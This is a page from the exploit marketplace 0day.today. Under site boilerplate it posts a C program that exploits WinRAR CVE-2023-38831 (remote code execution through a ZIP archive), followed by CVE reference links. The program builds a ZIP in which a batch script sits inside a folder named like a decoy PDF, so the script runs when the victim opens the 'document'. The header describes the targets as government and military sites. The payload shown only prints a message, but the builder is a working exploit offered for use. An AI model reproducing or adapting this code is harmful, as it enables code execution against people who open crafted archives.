0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WinRAR version 6.22 - Remote Code Execution via ZIP archive Exploit
################################################################################################ # Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # Description : All target's GOV & Military websites # # # ################################################################################################ # # # Expl0iTs: # #include <stdio.h> #include <stdlib.h> #include <string.h> #include "zip.h" #define PDF_FILE "document.pdf" #define FOLDER_NAME "document.pdf\\" #define SCRIPT_FILE "script.bat" #define ZIP_FILE "exploit.zip" int main(void) { zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE); if (zf == NULL) { printf("Error opening ZIP file\n"); return -1; } zip_fileinfo zfi; memset(&zfi, 0, sizeof(zfi)); if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding PDF file to ZIP file\n"); zipClose(zf, NULL); return -1; } FILE *fp = fopen(PDF_FILE, "rb"); if (fp == NULL) { printf("Error opening PDF file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } char buffer[1024]; int bytes_read; while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) { if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) { printf("Error writing PDF file to ZIP file\n"); fclose(fp); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } } fclose(fp); zipCloseFileInZip(zf); if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding folder to ZIP file\n"); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); char script_name[256]; sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE); if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding script file to ZIP file\n"); zipClose(zf, NULL); return -1; } char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n"; if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) { printf("Error writing script file to ZIP file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); zipClose(zf, NULL); printf("ZIP file created successfully\n"); return 0; } https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://github.com/HDCE-inc/CVE-2023-38831 https://www.cvedetails.com/cve/CVE-2023-38831/ https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/ https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831 http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/ https://news.ycombinator.com/item?id=37236100 https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/ https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2 # 0day.today [2024-05-20] #